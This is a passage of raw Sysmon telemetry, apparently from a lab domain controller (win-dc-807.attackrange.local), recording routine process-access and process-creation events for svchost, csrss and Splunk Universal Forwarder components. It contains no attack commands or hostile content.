15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7DDB-5FA1-8401-000000008801}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.234{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DDB-5FA1-8401-000000008801}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:15.235{D28789B6-7DDB-5FA1-8401-000000008801}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7DDC-5FA1-8501-000000008801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7DDC-5FA1-8501-000000008801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.391{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7DDC-5FA1-8501-000000008801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:57:16.392{D28789B6-7DDC-5FA1-8501-000000008801}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006999Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E13-5FA1-8701-000000008801}1352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:58:11.883{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 